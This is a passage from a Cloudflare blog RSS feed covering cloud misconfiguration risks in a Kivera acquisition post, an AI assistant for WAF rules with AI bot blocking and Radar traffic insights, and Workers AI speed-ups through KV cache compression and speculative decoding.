compromise security.</p></li></ul>
    <div>
      <h3>Common exploitation methods </h3>
      <a href="#common-exploitation-methods">
        
      </a>
    </div>
    <p>Threat actors exploit cloud services through various means, including targeting misconfigurations, abusing privileges, and bypassing encryption. Misconfigurations such as exposed storage buckets or improperly secured APIs offer attackers easy access to sensitive data and resources. Privilege abuse occurs when attackers gain unauthorized access through compromised credentials or poorly managed identity and access management (IAM) policies, allowing them to escalate their access and move laterally within the cloud environment. Additionally, unencrypted data enables attackers to intercept and decrypt data in transit or at rest, further compromising the integrity and confidentiality of sensitive information.</p><p>Here are some other vulnerabilities that organizations should address: </p><ul><li><p><b>Unrestricted access to cloud tenants:</b> Allowing unrestricted access exposes cloud platforms to <a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">data exfiltration</a> by malicious actors. Limiting access to approved tenants with specific IP addresses and service destinations helps prevent unauthorized access.</p></li><li><p><b>Exposed access keys:</b> Exposed access keys can be exploited by unauthorized parties to steal or delete data. Requiring encryption for the access keys and restricting their usage can mitigate this risk.</p></li><li><p><b>Excessive account permissions:</b> Granting excessive privileges to cloud accounts increases the potential impact of security breaches. Limiting permissions to necessary operations helps prevent lateral movement and privilege escalation by threat actors.</p></li><li><p><b>Inadequate network segmentation:</b> Poorly managed network security groups and insufficient segmentation practices can allow attackers to move freely within cloud environments. Drawing boundaries around your cloud resources and tenants ensures that data stays within your organization.</p></li><li><p><b>Improper public access configuration:</b> Incorrectly exposing critical services or storage resources to the internet increases the likelihood of unauthorized access and data compromise. Preventing public access drastically reduces risk.</p></li><li><p><b>Shadow cloud infrastructure:</b> Abandoned or neglected cloud instances are often left vulnerable to exploitation, providing attackers with opportunities to access sensitive data left behind. Preventing untagged or unapproved cloud resources to be created can reduce the risk of exposure.</p></li></ul>
    <div>
      <h2>Limitations of existing tools </h2>
      <a href="#limitations-of-existing-tools">
        
      </a>
    </div>
    <p>Many organizations turn to CSPM tools to give them more visibility into cloud misconfigurations. These tools often alert teams after an issue occurs, putting security teams in a reactive mode. Remediation efforts require collaboration between security teams and developers to implement changes, which can be time-consuming and resource-intensive. This approach not only delays issue resolution but also exposes companies to compliance and legal risks, while failing to train employees on secure cloud practices. <a href="https://www.ibm.com/reports/data-breach-action-guide"><u>On average</u></a>, it takes 207 days to identify these breaches and an additional 70 days to contain them. </p><p>Addressing the growing threat of cloud misconfigurations requires proactive security measures and continuous monitoring. Organizations must adopt proactive security solutions that not only detect and alert but also prevent misconfigurations from occuring in the first place and enforce best practices. Creating a first line of defense for cloud deployment errors reduces the volume of alerts for customers, especially those also using CSPM tools or CNAPPs. </p><p>By implementing these proactive strategies, organizations can safeguard their cloud environments against the evolving landscape of cyber threats, ensuring robust security and compliance while minimizing risks and operational disruptions.</p>
    <div>
      <h2>What’s next for Kivera</h2>
      <a href="#whats-next-for-kivera">
        
      </a>
    </div>
    <p>The Kivera product will not be a point solution add-on. We’re making it a core part of our Cloudflare One offering because integrating features from products like our Secure Web Gateway give customers a comprehensive solution that works better together.</p><p>We’re excited to welcome Kivera to the Cloudflare team. Through the end of 2024 and into early 2025, Kivera’s team will focus on integrating their preventive inline cloud app controls directly into Cloudflare One. We are looking for early access testers and teams to provide feedback about what they would like to see. If you’d like early access, please <a href="https://www.cloudflare.com/lp/cloud-app-controls"><u>join the waitlist</u></a>.</p><p><sub>[1] Source: Outcome-Driven Metrics You Can Use to Evaluate Cloud Security Controls, Gartner, Charlie Winckless, Paul Proctor, Manuel Acosta, 09/28/2023 </sub></p><p><sub>GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.</sub></p><p>
</p> ]]></content:encoded>
            <category><![CDATA[Data Protection]]></category>
            <category><![CDATA[Acquisitions]]></category>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <guid isPermaLink="false">6e7vmGCa8tZRTNJWqYs1di</guid>
            <dc:creator>Noelle Kagan</dc:creator>
            <dc:creator>Neil Brown</dc:creator>
            <dc:creator>Yumna Moazzam</dc:creator>
        </item>
        <item>
            <title><![CDATA[AI Everywhere with the WAF Rule Builder Assistant, Cloudflare Radar AI Insights, and updated AI bot protection]]></title>
            <link>https://blog.cloudflare.com/bringing-ai-to-cloudflare/</link>
            <pubDate>Fri, 27 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ This year for Cloudflare’s birthday, we’ve extended our AI Assistant capabilities to help you build new WAF rules, added new AI bot & crawler traffic insights to Radar, and given customers new AI bot  ]]></description>
            <content:encoded><![CDATA[ <p>The continued growth of AI has fundamentally changed the Internet over the past 24 months. AI is increasingly ubiquitous, and Cloudflare is leaning into the new opportunities and challenges it presents in a big way. This year for Cloudflare’s birthday, we’ve extended our AI Assistant capabilities to help you build new WAF rules, added AI bot traffic insights on Cloudflare Radar, and given customers new <a href="https://www.cloudflare.com/learning/ai/how-to-block-ai-crawlers/">AI bot blocking capabilities</a>.  </p>
    <div>
      <h2>AI Assistant for WAF Rule Builder</h2>
      <a href="#ai-assistant-for-waf-rule-builder">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5RYC4wmCDbs0axY92FfkFk/a728906cb6a902dd1c78ec93a0f650c2/BLOG-2564_1.png" />
          </figure><p>At Cloudflare, we’re always listening to your feedback and striving to make our products as user-friendly and powerful as possible. One area where we've heard your feedback loud and clear is in the complexity of creating custom and rate-limiting rules for our Web Application Firewall (WAF). With this in mind, we’re excited to introduce a new feature that will make rule creation easier and more intuitive: the AI Assistant for WAF Rule Builder. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7avSjubqlfg7L8ymKEztgk/7c3c31e50879ec64bccc384bdfcd5524/BLOG-2564_2.png" />
          </figure><p>By simply entering a natural language prompt, you can generate a custom or rate-limiting rule tailored to your needs. For example, instead of manually configuring a complex rule matching criteria, you can now type something like, "Match requests with low bot score," and the assistant will generate the rule for you. It’s not about creating the perfect rule in one step, but giving you a strong foundation that you can build on. </p><p>The assistant will be available in the Custom and Rate Limit Rule Builder for all WAF users. We’re launching this feature in Beta for all customers, and we encourage you to give it a try. We’re looking forward to hearing your feedback (via the UI itself) as we continue to refine and enhance this tool to meet your needs.</p>
    <div>
      <h2>AI bot traffic insights on Cloudflare Radar</h2>
      <a href="#ai-bot-traffic-insights-on-cloudflare-radar">
        
      </a>
    </div>
    <p>AI platform providers use bots to crawl and scrape websites, vacuuming up data to use for model training. This is frequently done without the permission of, or a business relationship with, the content owners and providers. In July, Cloudflare urged content owners and providers to <a href="https://blog.cloudflare.com/declaring-your-aindependence-block-ai-bots-scrapers-and-crawlers-with-a-single-click/"><u>“declare their AIndependence”</u></a>, providing them with a way to block AI bots, <a href="https://www.cloudflare.com/learning/ai/how-to-prevent-web-scraping/">scrapers</a>, and crawlers with a single click. In addition to this so-called “easy button” approach, sites can provide more specific guidance to these bots about what they are and are not allowed to access through directives in a <a href="https://www.cloudflare.com/en-gb/learning/bots/what-is-robots-txt/"><u>robots.txt</u></a> file. Regardless of whether a customer chooses to block or allow requests from AI-related bots, Cloudflare has insight into request activity from these bots, and associated traffic trends over time.</p><p>Tracking traffic trends for AI bots can help us better understand their activity over time — which are the most aggressive and have the highest volume of requests, which launch crawls on a regular basis, etc. The new <a href="https://radar.cloudflare.com/traffic#ai-bot-crawler-traffic"><b><u>AI bot &amp; crawler traffic </u></b><u>graph on Radar’s Traffic page</u></a> provides insight into these traffic trends gathered over the selected time period for the top known AI bots. The associated list of bots tracked here is based on the <a href="https://github.com/ai-robots-txt/ai.robots.txt"><u>ai.robots.txt list</u></a>, and will be updated with new bots as they are identified. <a href="https://developers.cloudflare.com/api/operations/radar-get-ai-bots-timeseries-group-by-user-agent"><u>Time series</u></a> and <a href="https://developers.cloudflare.com/api/operations/radar-get-ai-bots-summary-by-user-agent"><u>summary</u></a> data is available from the Radar API as well. (Traffic trends for the full set of AI bots &amp; crawlers <a href="https://radar.cloudflare.com/explorer?dataSet=ai.bots"><u>can be viewed in the new Data Explorer</u></a>.)</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5tYefQaBhTPYpqZPtE6KPu/f60694d0b24de2acba13fe0944589885/BLOG-2564_3.png" />
          </figure>
    <div>
      <h2>Blocking more AI bots</h2>
      <a href="#blocking-more-ai-bots">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/UiFu8l6K4Pm3ulxTK3XU0/541d109e29a9ae94e4792fdf94f7e4aa/BLOG-2564_4.png" />
          </figure><p>For Cloudflare’s birthday, we’re following up on our previous blog post, <a href="https://blog.cloudflare.com/declaring-your-aindependence-block-ai-bots-scrapers-and-crawlers-with-a-single-click/"><i><u>Declaring Your AIndependence</u></i></a>, with an update on the new detections we’ve added to stop AI bots. Customers who haven’t already done so can simply <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/bots/configure"><u>click the button</u></a> to block AI bots to gain more protection for their website. </p>
    <div>
      <h3>Enabling dynamic updates for the AI bot rule</h3>
      <a href="#enabling-dynamic-updates-for-the-ai-bot-rule">
        
      </a>
    </div>
    <p>The old button allowed customers to block <i>verified</i> AI crawlers, those that respect robots.txt and crawl rate, and don’t try to hide their behavior. We’ve added new crawlers to that list, but we’ve also expanded the previous rule to include 27 signatures (and counting) of AI bots that <i>don’t </i>follow the rules. We want to take time to say “thank you” to everyone who took the time to use our “<a href="https://docs.google.com/forms/d/14bX0RJH_0w17_cAUiihff5b3WLKzfieDO4upRlo5wj8"><u>tip line</u></a>” to point us towards new AI bots. These tips have been extremely helpful in finding some bots that would not have been on our radar so quickly. </p><p>For each bot we’ve added, we’re also adding them to our “Definitely automated” definition as well. So, if you’re a self-service plan customer using <a href="https://blog.cloudflare.com/super-bot-fight-mode/"><u>Super Bot Fight Mode</u></a>, you’re already protected. Enterprise Bot Management customers will see more requests shift from the “Likely Bot” range to the “Definitely automated” range, which we’ll discuss more below.</p><p>Under the hood, we’ve converted this rule logic to a <a href="https://developers.cloudflare.com/waf/managed-rules/"><u>Cloudflare managed rule</u></a> (the same framework that powers our WAF). This enables our security analysts and engineers to safely push updates to the rule in real-time, similar to how new WAF rule changes are rapidly delivered to ensure our customers are protected against the latest CVEs. If you haven’t logged back into the Bots dashboard since the previous version of our AI bot protection was announced, click the button again to update to the latest protection. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2tI8Yqxt1S0UPapImb32J4/6cb9e9bf423c370383edb820e5722929/BLOG-2564_5.png" />
          </figure>
    <div>
      <h3>The impact of new fingerprints on the model </h3>
      <a href="#the-impact-of-new-fingerprints-on-the-model">
        
      </a>
    </div>
    <p>One hidden beneficiary of fingerprinting new AI bots is our ML model. <a href="https://blog.cloudflare.com/cloudflare-bot-management-machine-learning-and-more/"><u>As we’ve discussed before</u></a>, our global ML model uses supervised machine learning and greatly benefits from more sources of labeled bot data. Below, you can see how well our ML model recognized these requests as automated, before and after we updated the button, adding new rules. To keep things simple, we have shown only the top 5 bots by the volume of requests on the chart. With the introduction of our new managed rule, we have observed an improvement in our detection capabilities for the majority of these AI bots. Button v1 represents the old option that let customers block only verified AI crawlers, while Button v2 is the newly introduced feature that includes managed rule detections.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2CZVGyDCp9ZtMrZdIi49fE/aacd04d240e9348b5a9b65bad4b470e2/BLOG-2564_6.jpg" />
          </figure><p>So how did we make our detections more robust? As we have mentioned before, sometimes <a href="https://blog.cloudflare.com/cloudflare-bot-management-machine-learning-and-more/"><i><u>a single attribute can give a bot away</u></i></a>. We developed a sophisticated set of heuristics tailored to these AI bots, enabling us to effortlessly and accurately classify them as such. Although our ML model was already detecting the vast majority of these requests, the integration of additional heuristics has resulted in a noticeable increase in detection rates for each bot, and ensuring we score every request correctly 100% of the time. Transitioning from a purely machine learning approach to incorporating heuristics offers several advantages, including faster detection times and greater certainty in classification. While deploying a machine learning model is complex and time-consuming, new heuristics can be created in minutes. </p><p>The initial launch of the AI bots block button was well-received and is now used by over 133,000 websites, with significant adoption even among our Free tier customers. The newly updated button, launched on August 20, 2024, is rapidly gaining traction. Over 90,000 zones have already adopted the new rule, with approximately 240 new sites integrating it every hour. Overall, we are now helping to protect the intellectual property of more than 146,000 sites from AI bots, and we are currently blocking 66 million requests daily with this new rule. Additionally, we’re excited to announce that support for configuring AI bots protection via Terraform will be available by the end of this year, providing even more flexibility and control for managing your bot protection settings.</p>
    <div>
      <h3>Bot behavior</h3>
      <a href="#bot-behavior">
        
      </a>
    </div>
    <p>With the enhancements to our detection capabilities, it is essential to assess the impact of these changes to bot activity on the Internet. Since the launch of the updated AI bots block button, we have been closely monitoring for any shifts in bot activity and adaptation strategies. The most basic fingerprinting technique we use to identify AI bot looking for simple user-agent matches. User-agent matches are important to monitor because they indicate the bot is transparently announcing who they are when they’re crawling a website. </p><p>The graph below shows a volume of traffic we label as AI bot over the past two months. The blue line indicates the daily request count, while the red line represents the monthly average number of requests. In the past two months, we have seen an average reduction of nearly 30 million requests, with a decrease of 40 million in the most recent month.This decline coincides with the release of Button v1 and Button v2. Our hypothesis is that with the new AI bots blocking feature, Cloudflare is blocking a majority of these bots, which is discouraging them from crawling. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/23ULxmxBIRskEONlWVIvlA/1dbd3d03239047492c2d4f7307217d97/BLOG-2564_7.jpg" />
          </figure><p>This hypothesis is supported by the observed decline in requests from several top AI crawlers. Specifically, the Bytespider bot reduced its daily requests from approximately 100 million to just 50 million between the end of June and the end of August (see graph below). This reduction could be attributed to several factors, including our new AI bots block button and changes in the crawler's strategy.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5UwtyZSXULrVzIqLcICGKd/fdf02c15d17e1d7ed248ba5f8a97eb54/BLOG-2564_8.jpg" />
          </figure><p>We have also observed an increase in the accountability of some AI crawlers. The most basic fingerprinting technique we use to identify AI bot looking for simple user-agent matches. User-agent matches are important to monitor because they indicate the bot is transparently announcing who they are when they’re crawling a website. These crawlers are now more frequently using their agents, reflecting a shift towards more transparent and responsible behavior. Notably, there has been a dramatic surge in the number of requests from the Perplexity user agent. This increase might be linked to <a href="https://rknight.me/blog/perplexity-ai-is-lying-about-its-user-agent/">previous accusations<u> </u></a>that Perplexity did not properly present its user agent, which could have prompted a shift in their approach to ensure better identification and compliance. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7Hq2vUMqqdNCyaxNTCg3JD/610ad53d57203203c5176229245c8086/BLOG-2564_9.jpg" />
          </figure><p>These trends suggest that our updates are likely affecting how AI crawlers interact with content. We will continue to monitor AI bot activity to help users control who accesses their content and how. By keeping a close watch on emerging patterns, we aim to provide users with the tools and insights needed to make informed decisions about managing their traffic. </p>
    <div>
      <h2>Wrap up</h2>
      <a href="#wrap-up">
        
      </a>
    </div>
    <p>We’re excited to continue to explore the AI landscape, whether we’re finding more ways to make the Cloudflare dashboard usable or new threats to guard against. Our AI insights on Radar update in near real-time, so please join us in watching as new trends emerge and discussing them in the <a href="https://community.cloudflare.com/"><u>Cloudflare Community</u></a>. </p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[AI Bots]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Generative AI]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6HqKUMoXg0wFIQg9howLMX</guid>
            <dc:creator>Adam Martinetti</dc:creator>
            <dc:creator>Harsh Saxena</dc:creator>
            <dc:creator>Gauri Baraskar</dc:creator>
            <dc:creator>Carlos Azevedo</dc:creator>
            <dc:creator>David Belson</dc:creator>
        </item>
        <item>
            <title><![CDATA[Making Workers AI faster and more efficient: Performance optimization with KV cache compression and speculative decoding]]></title>
            <link>https://blog.cloudflare.com/making-workers-ai-faster/</link>
            <pubDate>Thu, 26 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ With a new generation of data center accelerator hardware and using optimization techniques such as KV cache compression and speculative decoding, we’ve made large language model (LLM) ]]></description>
            <content:encoded><![CDATA[ <p>During Birthday Week 2023, <a href="https://blog.cloudflare.com/workers-ai/"><u>we launched Workers AI</u></a>. Since then, we have been listening to your feedback, and one thing we’ve heard consistently is that our customers want Workers AI to be faster. In particular, we hear that large language model (LLM) generation needs to be faster. Users want their interactive chat and agents to go faster, developers want faster help, and users do not want to wait for applications and generated website content to load. Today, we’re announcing three upgrades we’ve made to Workers AI to bring faster and more efficient inference to our customers: upgraded hardware, KV cache compression, and speculative decoding.</p>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p>Thanks to Cloudflare’s <a href="https://blog.cloudflare.com/gen-12-servers/"><u>12th generation compute servers</u></a>, our network now supports a newer generation of GPUs capable of supporting larger models and faster inference. Customers can now use <a href="https://developers.cloudflare.com/workers-ai/models/llama-3.2-11b-vision-instruct"><u>Meta Llama 3.2 11B</u></a>, Meta’s <a href="https://ai.meta.com/blog/llama-3-2-connect-2024-vision-edge-mobile-devices/"><u>newly released</u></a> multi-modal model with vision support, as well as Meta Llama 3.1 70B on Workers AI. Depending on load and time of day, customers can expect to see two to three times the throughput for Llama 3.1 and 3.2 compared to our previous generation Workers AI hardware. More performance information for these models can be found in today’s post: <a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster"><i><u>Cloudflare’s Bigger, Better, Faster AI platform</u></i></a>.</p>
    <div>
      <h2>New KV cache compression methods, now open source</h2>
      <a href="#new-kv-cache-compression-methods-now-open-source">
        
      </a>
    </div>
    <p>In our effort to deliver low-cost low-latency inference to the world, Workers AI has been developing novel methods to boost efficiency of LLM inference. Today, we’re excited to announce a technique for KV cache compression that can help increase throughput of an inference platform. And we’ve made it open source too, so that everyone can benefit from our research.</p>
    <div>
      <h3>It’s all about memory</h3>
      <a href="#its-all-about-memory">
        
      </a>
    </div>
    <p>One of the main bottlenecks when running LLM inference is the amount of vRAM (memory) available. Every word that an LLM processes generates a set of vectors that encode the meaning of that word in the context of any earlier words in the input that are used to generate new tokens in the future. These vectors are stored in the <i>KV cache</i>, causing the memory required for inference to scale linearly with the total number of tokens of all sequences being processed. This makes memory a bottleneck for a lot of transformer-based models. Because of this, the amount of memory an instance has available limits the number of sequences it can generate concurrently, as well as the maximum token length of sequences it can generate.</p>
    <div>
      <h3>So what is the KV cache anyway?</h3>
      <a href="#so-what-is-the-kv-cache-anyway">
        
      </a>
    </div>
    <p>LLMs are made up of layers, with an <a href="https://en.wikipedia.org/wiki/Attention_(machine_learning)"><u>attention</u></a> operation occurring in each layer. Within each layer’s attention operation, information is collected from the representations of all previous tokens that are stored in cache. This means that vectors in the KV cache are organized into layers, so that the active layer’s attention operation can only query vectors from the corresponding layer of KV cache. Furthermore, since attention within each layer is parallelized across multiple attention “heads”, the KV cache vectors of a specific layer are further subdivided into groups corresponding to each attention head of that layer.</p><p>The diagram below shows the structure of an LLM’s KV cache for a single sequence being generated. Each cell represents a KV and the model’s representation for a token consists of all KV vectors for that token across all attention heads and layers. As you can see, the KV cache for a single layer is allocated as an M x N matrix of KV vectors where M is the number of attention heads and N is the sequence length. This will be important later!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ZagFp9yy3E55SR8GKRBvh/9e37f5890165e758ccaebf77464be483/BLOG-2571_2.png" />
          </figure><p>For a deeper look at attention, see the original “<a href="https://arxiv.org/abs/1706.03762"><u>Attention is All You Need</u></a>” paper. </p>
    <div>
      <h3>KV-cache compression — “use it or lose it”</h3>
      <a href="#kv-cache-compression-use-it-or-lose-it">
        
      </a>
    </div>
    <p>Now that we know what the KV cache looks like, let’s dive into how we can shrink it!</p><p>The most common approach to compressing the KV cache involves identifying vectors within it that are unlikely to be queried by future attention operations and can therefore be removed without impacting the model’s outputs. This is commonly done by looking at the past attention weights for each pair of key and value vectors (a measure of the degree with which that KV’s representation has been queried during past attention operations) and selecting the KVs that have received the lowest total attention for eviction. This approach is conceptually similar to a LFU (least frequently used) cache management policy: the less a particular vector is queried, the more likely it is to be evicted in the future.</p>
    <div>
      <h3>Different attention heads need different compression rates</h3>
      <a href="#different-attention-heads-need-different-compression-rates">
        
      </a>
    </div>
    <p>As we saw earlier, the KV cache for each sequence in a particular layer is allocated on the GPU as a <i># attention heads X sequence length</i> tensor. This means that the total memory allocation scales with the <i>maximum</i> sequence length for all attention heads of the KV cache. Usually this is not a problem, since each sequence generates the same number of KVs per attention head.</p><p>When we consider the problem of eviction-based KV cache compression, however, this forces us to remove an equal number of KVs from each attention head when doing the compression. If we remove more KVs from one attention head alone, those removed KVs won’t actually contribute to lowering the memory footprint of the KV cache on GPU, but will just add more empty “padding” to the corresponding rows of the tensor. You can see this in the diagram below (note the empty cells in the second row below):</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/68Q5hVbfRF1vhqyeGNzB1Q/91056db8208c5e74be00e0add147b3e9/BLOG-2571_3.png" />
          </figure><p>The extra compression along the second head frees slots for two KVs, but the cache’s shape (and memory footprint) remains the same.</p><p>This forces us to use a fixed compression rate for all attention heads of KV cache, which is very limiting on the compression rates we can achieve before compromising performance.</p>
    <div>
      <h3>Enter PagedAttention</h3>
      <a href="#enter-pagedattention">
        
      </a>
    </div>
    <p>The solution to this problem is to change how our KV cache is represented in physical memory. <a href="https://arxiv.org/abs/2309.06180"><u>PagedAttention</u></a> can represent N x M tensors with padding efficiently by using an N x M block table to index into a series of “blocks”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Sia3ZKKzBaHEfI8qLYr8o/57edb68d61ff916d322502aeb406c88c/BLOG-2571_4.png" />
          </figure><p>This lets us retrieve the i<sup>th</sup> element of a row by taking the i<sup>th</sup> block number from that row in the block table and using the block number to lookup the corresponding block, so we avoid allocating space to padding elements in our physical memory representation. In our case, the elements in physical memory are the KV cache vectors, and the <i>M </i>and <i>N</i> that define the shape of our block table are the number of attention heads and sequence length, respectively. Since the block table is only storing integer indices (rather than high-dimensional KV vectors), its memory footprint is negligible in most cases.</p>
    <div>
      <h3>Results</h3>
      <a href="#results">
        
      </a>
    </div>
    <p>Using paged attention lets us apply different rates of compression to different heads in our KV cache, giving our compression strategy more flexibility than other methods. We tested our compression algorithm on <a href="https://arxiv.org/abs/2308.14508"><u>LongBench</u></a> (a collection of long-context LLM benchmarks) with Llama-3.1-8B and found that for most tasks we can retain over 95% task performance while reducing cache size by up to 8x (left figure below). Over 90% task performance can be retained while further compressing up to 64x. That means you have room in memory for 64 times as many tokens!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/pdz5rPhYdfnMmn6cxhczo/29b69bb65aea8989fc1f50283e8ecbc5/BLOG-2571_5.png" />
          </figure><p>This lets us increase the number of requests we can process in parallel, increasing the total throughput (total tokens generated per second) by 3.44x and 5.18x for compression rates of 8x and 64x, respectively (right figure above).</p>
    <div>
      <h3>Try it yourself!</h3>
      <a href="#try-it-yourself">
        
      </a>
    </div>
    <p>If you’re interested in taking a deeper dive check out our <a href="https://github.com/IsaacRe/vllm-kvcompress"><u>vLLM fork</u></a> and get compressing!!</p>
    <div>
      <h2>Speculative decoding for faster throughput</h2>
      <a href="#speculative-decoding-for-faster-throughput">
        
      </a>
    </div>
    <p>A new inference strategy that we implemented is speculative decoding, which is a very popular way to get faster throughput (measured in tokens per second). LLMs work by predicting the next expected token (a token can be a word, word fragment or single character) in the sequence with each call to the model, based on everything that the model has seen before. For the first token generated, this means just the initial prompt, but after that each subsequent token is generated based on the prompt plus all other tokens that have been generated. Typically, this happens one token at a time, generating a single word, or even a single letter, depending on what comes next.</p><p>But what about this prompt:</p><blockquote><p><i>Knock, knock!</i></p></blockquote><p>If you are familiar with knock-knock jokes, you could very accurately predict more than one token ahead. For an English language speaker, what comes next is a very specific sequence that is four to five tokens long: “Who’s there?” or “Who is there?” Human language is full of these types of phrases where the next word has only one, or a few, high probability choices. Idioms, common expressions, and even basic grammar are all examples of this. So for each prediction the model makes, we can take it a step further with speculative decoding to predict the next <i>n</i> tokens. This allows us to speed up inference, as we’re not limited to predicting one token at a time.</p><p>There are several different implementations of speculative decoding, but each in some way uses a smaller, faster-to-run model to generate more than one token at a time. For Workers AI, we have applied <a href="https://github.com/apoorvumang/prompt-lookup-decoding"><u>prompt-lookup decoding</u></a> to some of the LLMs we offer. This simple method matches the last <i>n </i>tokens of generated text against text in the prompt/output and predicts candidate tokens that continue these identified patterns as candidates for continuing the output. In the case of knock-knock jokes, it can predict all the tokens for <i>“Who’s there</i>” at once after seeing “<i>Knock, knock!</i>”, as long as this setup occurs somewhere in the prompt or previous dialogue already. Once these candidate tokens have been predicted, the model can verify them all with a single forward-pass and choose to either accept or reject them. This increases the generation speed of llama-3.1-8b-instruct by up to 40% and the 70B model by up to 70%.</p><p>Speculative decoding has tradeoffs, however. Typically, the results of a model using speculative decoding have a lower quality, both when measured using benchmarks like <a href="https://paperswithcode.com/dataset/mmlu"><u>MMLU</u></a> as well as when compared by humans. More aggressive speculation can speed up sequence generation, but generally comes with a greater impact to the quality of the result. Prompt lookup decoding offers one of the smallest overall quality impacts while still providing performance improvements, and we will be adding it to some language models on Workers AI including <a href="https://developers.cloudflare.com/workers-ai/models/llama-3-8b-instruct"><u>@cf/meta/llama-3.1-8b-instruct</u></a>.</p><p>And, by the way, here is one of our favorite knock-knock jokes, can you guess the punchline?</p><blockquote><p><i>Knock, knock!</i></p><p><i>Who’s there?</i></p><p><i>Figs!</i></p><p><i>Figs who?</i></p><p><i>Figs the doorbell, it’s broken!</i></p></blockquote>
    <div>
      <h2>Keep accelerating</h2>
      <a href="#keep-accelerating">
        
      </a>
    </div>
    <p>As the AI industry continues to evolve, there will be new hardware and software that allows customers to get faster inference responses. Workers AI is committed to researching, implementing, and making upgrades to our services to help you get fast inference. As an Inference-as-a-Service platform, you’ll be able to benefit from all the optimizations we apply, without having to hire your own team of ML researchers and SREs to manage inference software and hardware deployments.

We’re excited for you to try out some of these new releases we have and let us know what you think! Check out our full-suite of AI announcements <a href="https://blog.cloudflare.com/tag/ai/"><u>here</u></a> and check out the <a href="https://developers.cloudflare.com/workers-ai/"><u>developer docs</u></a> to get started.</p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[LLM]]></category>
            <guid isPermaLink="false">29PAMer5L0do12OtNa557I</guid>
            <dc:creator>Isaac Rehg</dc:creator>
            <dc:creator>Jesse Kipp</dc:creator>
        </item>
    </channel>
</rss>